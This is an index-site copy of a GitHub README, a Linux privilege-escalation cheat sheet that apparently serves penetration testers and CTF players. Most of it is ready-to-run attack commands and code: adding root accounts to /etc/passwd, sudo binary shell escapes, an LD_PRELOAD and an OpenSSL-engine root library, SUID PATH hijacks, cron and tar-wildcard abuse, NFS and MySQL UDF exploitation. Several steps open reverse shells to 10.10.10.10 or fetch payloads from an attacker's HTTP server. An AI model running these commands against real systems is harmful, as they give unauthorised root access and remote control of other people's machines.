Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics
Simple and accurate guide for linux privilege escalation tactics
https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics
Last synced: 22 days ago
JSON representation
Simple and accurate guide for linux privilege escalation tactics
- Host: GitHub
- URL: https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics
- Owner: RoqueNight
- Created: 2020-08-24T12:16:13.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2023-12-11T22:58:49.000Z (about 1 year ago)
- Last Synced: 2024-02-11T21:18:15.453Z (10 months ago)
- Size: 262 KB
- Stars: 125
- Watchers: 3
- Forks: 26
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - RoqueNight/Linux-Privilege-Escalation-Basics - Simple and accurate guide for linux privilege escalation tactics (Others)
README
# Linux-Privilege-Escalation-Basics
Simple and accurate guide for linux privilege escalation tactics
# Privilege Escalation Methods
- Basic System Enumeration
- Bash History
- OpenVPN Credentials
- Credentials in tcpdump files
- Writable Files
- SSH Private Keys
- Kernel Expliots
- Sudo -l
- Sudo CVE
- Sudo LD_PRELOAD
- SUID / GUID Binaries
- SUID PATH Environmental Variable
- Cron Tabs & Scheduled Tasks
- Capabilities (Python - Perl - Tar - OpenSSL)
- NFS Root Squashing
- chkrootkit 0.49
- Tmux (Attach Session)
- Screen (Attach Session)
- MySQL Running as root
- MySQL UDF (User-Defined Functions) Code (UDF) Injection
# Basic System Enumeration
```
uname -a
hostname
lscpu
ls /home
ls /var/www/html
ls /var/www/
ps aux | grep root
netstat -tulpn
ps -aux | grep root | grep mysql
ifconfig
find . -type f -exec grep -i -I "PASSWORD=" {} /dev/null \;
locate pass | more
```
# Bash History
```
history
cat /home//.bash_history
cat ~/.bash_history | grep -i passw
```
# OpenVPN Credentials
```
locate *.ovpn
```
# Credentials in tcpdump files
```
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
```
# Writable Password Files
If you have write permission to the following files:
- /etc/passwd
- /etc/shadow
- /etc/sudoers
/etc/passwd
```
echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
su - root2
id && whoami
// Add new user to the system with GID and UID of 0
OR
vi /etc/passwd
Remote X (Password Holder) for root
wg!
su root
id && whoami
// Remove root's password
OR
echo root::0:0:root:/root:/bin/bash > /etc/passwd
id && whomai
OR
openssl passwd -1 -salt ignite NewRootPassword
Copy output
echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd
Replace with the copied output
su root2
id && whoami
```
/etc/shadow
```
Run python -c "import crypt; print crypt.crypt('NewRootPassword')"
Copy the output
vi /etc/shadow
Replace root's hash with the output that you generated
wq!
su root
id && whoami
```
/etc/sudoers
```
echo " ALL=(ALL:ALL) ALL" >> /etc/sudoers // Replace "Username" with your current user (Example: www-data)
sudo su
id && whoami
```
# SSH Private Keys
```
find / -name authorized_keys 2> /dev/null // Any Public Keys?
find / -name id_rsa 2> /dev/null // Any SSH private keys?
Copy id_rsa contents of keys found with the above command
Create a local file on your box and paste the content in
chmod 600
ssh -i user@IP
// Is the key password protected?
ssh2john > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```
# Kernel Expliots
```
uname -a // What OS kernel are we using?
// Google Search (Example): 4.4.0-116-generic #140-Ubuntu Expliots OR 4.4.0-116-generic #140-Ubuntu PoC github
// Read the expliots and follow the instructions
// Popular Linux Kernel Exploits
Dirty COW (CVE-2016-5195)
URL: https://dirtycow.ninja/
Other Kernel Expliots
URL: https://github.com/SecWiki/linux-kernel-exploits
```
# Sudo -l
Sudo -l
What binaries can we execute with Sudo?
Example Output
User www-data may run the following commands on
- (root) NOPASSWD: /usr/bin/find
- (root) NOPASSWD: /usr/bin/nmap
- (root) NOPASSWD: /usr/bin/env
- (root) NOPASSWD: /usr/bin/vim
- (root) NOPASSWD: /usr/bin/awk
- (root) NOPASSWD: /usr/bin/perl
- (root) NOPASSWD: /usr/bin/python
- (root) NOPASSWD: /usr/bin/less
- (root) NOPASSWD: /usr/bin/man
- (root) NOPASSWD: /usr/bin/ftp
- (root) NOPASSWD: /usr/bin/socat
- (root) NOPASSWD: /usr/bin/zip
- (root) NOPASSWD: /usr/bin/gcc
- (root) NOPASSWD: /usr/bin/docker
- (root) NOPASSWD: /usr/bin/env
- (root) NOPASSWD: /usr/bin/MySQL
- (root) NOPASSWD: /usr/bin/ssh
- (root) NOPASSWD: /usr/bin/tmux
- (root) NOPASSWD: /usr/bin/pkexec
- (root) NOPASSWD: /usr/bin/rlwrap
- (root) NOPASSWD: /usr/bin/xargs
- (root) NOPASSWD: /usr/bin/anansi_util
- (root) NOPASSWD: /usr/bin/apt-get
- (root) NOPASSWD: /usr/bin/flask run
- (root) NOPASSWD: /usr/bin/apache2
- (root) NOPASSWD: /usr/bin/wget
Absuing Sudo binaries to gain root
----------------------------------------------------
find
```
sudo find / etc/passwd -exec /bin/bash \;
```
Nmap
```
echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
```
Env
```
sudo env /bin/bash
```
Vim
```
sudo vim -c ':!/bin/bash'
```
Awk
```
sudo awk 'BEGIN {system("/bin/bash")}'
```
Perl
```
sudo perl -e 'exec "/bin/bash";'
```
Python
```
sudo python -c 'import pty;pty.spawn("/bin/bash")'
```
Less
```
sudo less /etc/hosts - !bash
```
Man
```
sudo man man - !bash
```
ftp
```
sudo ftp - ! /bin/bash
```
socat
```
Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
Victim = sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
```
Zip
```
echo test > notes.txt
sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
```
gcc
```
sudo gcc -wrapper /bin/bash,-s .
```
Docker
```
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
MySQL
```
sudo mysql -e '\! /bin/sh'
```
SSH
```
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```
Tmux
```
Sudo tmux
```
pkexec
```
sudo pkexec /bin/bash
```
rlwrap
```
sudo rlwrap /bin/bash
```
xargs
```
sudo xargs -a /dev/null sh
```
anansi_util
```
sudo /home/anansi/bin/anansi_util manual /bin/bash
```
apt-get
```
sudo apt-get update -o APT::Update::Pre-Invoke::=”/bin/bash -i”
```
flask run
```
echo 'import pty; pty.spawn(“/bin/bash”)' > flask.py
export FLASK_APP=flask.py
sudo /usr/bin/flask run
```
apache2
Victim
```
sudo apache2 -f /etc/shadow
Copy root's hash
```
Attacker
```
echo '' > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
// Replace with the hash that you copied
```
Back to Victim
```
su root
id && whoami
```
Wget
Victim
```
cp /etc/passwd /tmp/passwd
cat /etc/passwd
```
Attacker
```
Copy /etc/passwd content and put in a local file called passwd
Run python -c "import crypt; print crypt.crypt('NewRootPassword')"
Copy output of the above command
edit passwd
Replace x in root's line with the copied output
Save the file
python -m SimpleHTTPServer 9000 // You can use any port
```
Victim
```
sudo wget http://:9000/passwd -O /etc/passwd
su root // Enter the new root password you generated (Example: NewRootPassword)
id && whoami
```
# Sudo CVE
Expliot sudo with known CVE
CVE:
- CVE-2019-14287
- CVE-2019-16634
CVE-2019-14287
sudo -V // Get sudo version
sudo -l
Vulnerable output
Output = (ALL,!root) NOPASSWD: /bin/bash
```
sudo -u#-1 /bin/bash
id && whoami
```
CVE-2019-16634
sudo -V // Get sudo version
sudo su root // If you type root's password , can you see the *****? // That means pw_feedback is enabled
Expliot PoC: https://github.com/saleemrashid/sudo-cve-2019-18634
Download expliot.c
Upload to Victim
Attacker
```
python -m SimpleHTTPServer 9000 // You can use any port
```
Victim
```
wget http://:9000/expliot.c
Compile expliot.c: gcc expliot.c -o expliot
./expliot
id && whoami
```
# Sudo LD_PRELOAD
sudo -l
Example Output: env_reset, env_keep+=LD_PRELOAD // Do you have the same output with sudo binary rights?
Expliot
```
cd /tmp
vi priv.c
#include
#include
#include
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
Compile priv.c: gcc -fPIC -shared -o priv.so priv.c -nostartfiles
Command: sudo LD_PRELOAD=/tmp/priv.so awk // awk can be replaced with any sudo binary
```
# SUID / GUID Binaries Overview
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges. Assume we are accessing the target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.
Basically, you can change the permission of any file either using the “Numerical” method or “Symbolic” method. As result, it will replace x from s as shown in the below image which denotes especial execution permission with the higher privilege to a particular file/command. Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before read/write/execution operation.
Basic Enumeration
GUID permission is similar to the SUID permission, only difference is – when the script or command with SGID on is run, it runs as if it were a member of the same group in which the file is a member
Enumeration:
```
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
find / -perm -g=s -type f 2>/dev/null | xargs ls -l
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
// Look for any binaries that seem odd. Any binaries running from a users home directory?
// Check the version of any odd binaries and see if there are any public expliots that can be used to gain root
```
# SUID PATH Environmental Variable
PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands.
View PATH
```
echo $PATH
env | grep PATH
print $PATH
```
Example 1
Create a Simple Basic SUID binary
```
cd /home/max/
vi test.c
#include
void main()
{ setuid(0);
setgid(0);
system("curl -I 127.0.0.1");
}
```
Compile Binary & Add SUID Bit
```
gcc test.c -o network-tester
chmod u+s network-tester
mv network-tester /bin/tools/
```
Example 1 (Without full bin path)
Privilege Escalation
```
Find the SUID Binary
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Output Example: /bin/tools/network-tester
ls -la /bin/tools/network-tester
Test the SUID Binary
/bin/tools/network-tester
strings /bin/tools/network-tester
Output Example: curl -I 127.0.0.1
Absue the SUID Binary
echo "/bin/bash" > /tmp/curl
chmod 777 /tmp/curl
echo $PATH
export PATH=/tmp:$PATH
/bin/tools/network-tester
id && whoami
```
Example 3 (Without full bin path)
Privilege Escalation
```
Find the SUID Binary
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Output Example: /bin/tools/webserver-status
ls -la /bin/tools/webserver-status
Test the SUID Binary
/bin/tools/webserver-status
strings /bin/tools/webserver-status
Output Example: service apache2 status
Absue the SUID Binary
echo 'int mian() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
chmod 777 /tmp/service
export PATH=/tmp:$PATH
echo $PATH
/bin/tools/webserver-status
id && whoami
```
Example 4 (With full bin path)
Privilege Escalation
```
Find the SUID Binary
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Output Example: /bin/tools/webserver-status
ls -la /bin/tools/webserver-status
Test the SUID Binary
/bin/tools/webserver-status
strings /bin/tools/webserver-status
Output Example: /usr/sbin/service apache2 status
Absue the SUID Binary
fucntion /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
/bin/tools/webserver-status
id && whoami
```
Example 5 (/bin/systemctl)
Privilege Escalation
Copy line by line inside the victim low priv shell
```
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/bin/bash -p
id && whoami
```
Example 5 (Copy - /bin/cp)
Privilege Escalation
Victim
```
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Copy the contents of /etc/passwd to your local machine inside a new file called "passwd"
```
Attacker
```
Run the following command locally: openssl passwd -1 -salt ignite NewRootPassword
Copy the output
Add the following inside the local passwd file
echo "root2::0:0:root:/root:/bin/bash" >> passwd // Replace with the copied output
python -m SimpleHTTPServer 9000
```
Victim
```
wget -O /tmp/passwd http://10.10.10.10:9000/passwd
cp /tmp/passwd /etc/passwd
su root2
Password: NewRootPassword
id && whoami
// Replace Attacker IP & Port
```
# Cron Tabs & Scheduled Tasks
Cron jobs is a time-based job scheduler in Unix-like computer operating systems. Users that set up and maintain software environments use cron to schedule jobs to run periodically at fixed times, dates, or intervals
Enumeration
```
contab -l
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
```
Example 1
Privilege Escalation via Nonexistent File Overwrite
```
cat /etc/crontab
Output Example: * * * * * root systemupdate.sh
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh
Wait a while
/bin/bash -p
id && whoami
```
Example 2
Privilege Escalation via Root Executable Bash Script
```
cat /etc/crontab
Output Example: * * * * * root /usr/bin/local/network-test.sh
echo "chmod +s /bin/bash" >> /usr/bin/local/network-test.sh
Wait a while
id && whomai
```
Example 3
Privilege Escalation via Root Executable Python Script Overwrite
Target
```
cat /etc/crontab
Output Example: * * * * * root /var/www/html/web-backup.py
cd /var/www/html/
vi web-backup.py
Add the below to the script:
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.10.10",443));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
// Replace the IP & Port
// Save & Exit the Script
```
Attacker
```
nc -lvnp 443
```
OR
Target
```
cat /etc/crontab
Output Example: * * * * * root /var/www/html/web-backup.py
cd /var/www/html/
vi web-backup.py
Add the below to the script:
import os
os.system("chmod +s /bin/bash")
// Save & Exit the Script
Wait a While
/bin/bash -p
id && whoami
```
Example 4
Privilege Escalation via Tar Bash Script (WildCards)
```
cat /etc/crontab
Output Example: * * * * * root /usr/bin/local/mysql-db-backup.sh
cat /usr/bin/local/mysql-db-backup.sh
Output of Script:
--------------------------------
#!/bin/bash
cd /var/www/html/
tar czf /tmp/dbbackup.tar.gz *
--------------------------------
cd /var/www/html/
echo "#!/bin/bash" > priv.sh
echo "chmod +s /bin/bash" >> priv.sh
chmod +x priv.sh
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=sh\ priv.sh
Wait a while
/bin/bash -p
id && whomai
```
Example 5
Privilege Escalation via Tar Cron Job
```
cat /etc/crontab
Output Example: */1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
cd /var/www/html/
echo "chmod +s /bin/bash" > priv.sh
echo "" > "--checkpoint-action=exec=bash priv.sh
echo "" > --checkpoint=1
tar cf archive.tar *
// If it does not work , replace "bash" with "sh"
```
# Capabilities
Linux capabilities are special attributes in the Linux kernel that grant processes and binary executables specific privileges that are normally reserved for processes whose effective user ID is 0 (The root user, and only the root user, has UID 0).
Capabilities are those permissions that divide the privileges of kernel user or kernel level programs into small pieces so that a process can be allowed sufficient power to perform specific privileged tasks.
Essentially, the goal of capabilities is to divide the power of 'root' into specific privileges, so that if a process or binary that has one or more capability is exploited, the potential damage is limited when compared to the same process running as root.
Capabilities can be set on processes and executable files. A process resulting from the execution of a file can gain the capabilities of that file.
- Python
- Perl
- Tar
- OpenSSL
Python
```
getcap -r / 2>/dev/null
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id && whoami
OR
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id && whoami
```
Perl
```
getcap -r / 2>/dev/null
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
id && whoami
```
Tar
Method 1
```
Victim
getcap -r / 2>/dev/null
/usr/bin/tar = cap dac read search+ep
/usr/bin/tar -cvf shadow.tar /etc/shadow
/usr/bin/tar -xvf shadow.tar
cat etc/shadow
Copy content of users accounts to a local file called shadow
Attacker
john shadow --wordlist=/usr/share/wordlists/rockyou.txt
Crack root's credentials
Victim
su root
id && whoami
```
Method 2
```
Victim
getcap -r / 2>/dev/null
/usr/bin/tar = cap dac read search+ep
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar
cat id_rsa
# Download id_rsa to attacker machine
Attacker
chmod 600 id_rsa
ssh -i id_rsa root@
id && whoami
```
OpenSSL
Victim
```
getcap -r / 2>/dev/null
/usr/bin/openssl = cap_setuid+ep
```
Attacker
Create a .so file - Code below
vi priv.c
```
#include
#include
#include
#include
#include
static const char *engine_id = "test";
static const char *engine_name = "hope it works";
static int bind(ENGINE *e, const char *id)
{
int ret = 0;
if (!ENGINE_set_id(e, engine_id)) {
fprintf(stderr, "ENGINE_set_id failed\n");
goto end;
}
if (!ENGINE_set_name(e, engine_name)) {
printf("ENGINE_set_name failed\n");
goto end;
}
setuid(0);
setgid(0);
system("chmod +s /bin/bash");
system("echo Complete!");
ret = 1;
end:
return ret;
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
Compile Code & Create .so file
```
gcc -c fPIC priv.c -o priv
gcc -shared -o priv.so -lcrypto priv
```
Victim
Download .so from Attacker
```
wget -O /tmp/priv.so http://10.10.10.10:9000/priv.so
// Replace IP & Port
```
Get Root
```
openssl req -engine /tmp/priv.so
/bin/bash -p
id && whoami
```
# NFS Root Squashing
Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.
- rw: Permit clients to read as well as write access to the shared directory.
- ro: Permit clients to Read-only access to shared directory.
- root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account.
- no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication.
- async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client.
- sync: The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage.
Enumeration
```
Victim
cat /etc/exports // Do we see any no_root_squash enabled on a mounted share?
/tmp *(rw,sync,insecure,no_root_squash,no,subtree,check)
Attacker
nmap -sV --script=nfs-showmount
```
Privilege Escalation
Attacker
```
showmount -e
mkdir /tmp/mount
mount -o rw,vers=2 :/tmp /tmp/mount
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mount/priv.c
gcc /tmp/mount/priv.c -o /tmp/mount/priv
chmod +s /tmp/mount/priv
OR
showmount -e
mkdir /tmp/mount
mount -o rw,vers=2 :/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash
```
```
Victim
cd /tmp
./priv
id && whoami
OR
cd /tmp
./bash -p
id && whoami
```
# chkrootkit 0.49
```
Expliot: https://www.exploit-db.com/exploits/33899
cat /etc/cron.daily
/usr/bin/chkrootkit
ls -la /usr/bin/chkrootkit // Do we have SUID?
chkrootkit -V
echo "#!/bin/bash" > /tmp/update
echo "chmod +s /bin/bash" >> /tmp/update
Wait a While ...
/bin/bash -p
id && whoami
```
# Tmux
tmux is a terminal multiplexer for Unix-like operating systems.
It allows multiple terminal sessions to be accessed simultaneously in a single window.
It is useful for running more than one command-line program at the same time.
Tmux Cheat Sheet: https://tmuxcheatsheet.com/
Privilege Escalation
```
tmux list-sessions // Any Tmux sessions running as root?
/tmp/tmux-14/default-root // Root Tmux Session
tmux -S /tmp/tmux-14/default-root // Replace Path to Socket (Depending on your results)
OR
tmux list-sessions // Any Tmux sessions running as root?
/tmp/tmux-14/default-root // Root Tmux Session
tmux -S /opt/.dev/gbm/ attach -t 0 // Replace Path to Session (Depending on your results)
```
# MySQL Running as root
Example 1
```
ps aux | grep root
mysql -u root -p
\! chmod +s /bin/bash
exit
ls -la /bin/bash // Verify that the SUID bit is set
/bin/bash -p
id && whoami
```
Example 2
Victim
```
ps aux | grep root
mysql -u root -p
\! bash -i >& /dev/tcp/10.10.10.10/9999 0>&1
```
Attacker
```
nc -lvnp 9999
id && whoami
```
# MySQL UDF (User-Defined Functions) Code (UDF) Injection
User Defined Function (UDF) is a piece of code that extends the functionality of a MySQL server by adding a new function that behaves just like a native (built-in) MySQL function, such as abs() or concat()
UDFs are useful when you need to extend the functionality of your MySQL server
For penetration testing, we can include a UDF inside our database that loads a library that has the ability to execute commands via the sys_exec() function which gives us code execution
Example 1 - Reverse Shell
Download UDF (Linux - 64 Bit) = https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/mysql/linux/64
Download UDF (Linux - 32 Bit) = https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/mysql/linux/32
Victim
```
ps aux | grep root // Verify that MySQL is running as root
Save the UDF in the /tmp folder ( Example: /tmp/lib_mysqludf_sys.so)
mysql -u root -p
mysql> use mysql;
mysql> create table admin(line blob);
mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');
// Any UDF library can be used , as long as it is exploitable via the sys_exec() function
// The "admin" table name can be named anything
// Ensure that the path to the UDF (.so) is correct
// Replace IP & Port
```
Attacker
```
nc -lvnp 9999
```
Example 2 (Local via SUID)
Download UDF (Linux - 64 Bit) = https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/mysql/linux/64
Download UDF (Linux - 32 Bit) = https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/mysql/linux/32
Victim
```
ps aux | grep root // Verify that MySQL is running as root
Save the UDF in the /tmp folder ( Example: /tmp/lib_mysqludf_sys.so)
mysql -u root -p
mysql> use mysql;
mysql> create table admin(line blob);
mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('chmod +s /bin/bash');
mysql> exit
Wait a while
ls -la /bin/bash // Verify that the SUID bit is set
/bin/bash -p
id && whoami
```
Example 3 (Explioting MySQL 4.x/5.0 (Linux))
UDF Link: https://www.exploit-db.com/exploits/1518
Victim
```
wget -O priv.c https://www.exploit-db.com/download/1518
gcc –g –shared –Wl,–soname,priv.so –o priv.so priv.c –lc
chmod 777 priv.so
mv priv.so /tmp/
mysql -u root -p
mysql> create table priv(line blob);
mysql> insert into priv values(load_file(‘/tmp/priv.so’));
mysql> select * from priv into dumpfile ‘/usr/lib/mysql/plugin/priv.so’;
mysql> create function do_system returns integer soname ‘priv.so’;
mysql> select do_system(‘chmod +s /bin/bash’);
mysql>!sh
/bin/bash -p
id && whoami
// priv.c can be called anything
// The "priv" table name can be named anything
// Ensure that the path to the UDF (.so) is correct
// Replace IP & Port
```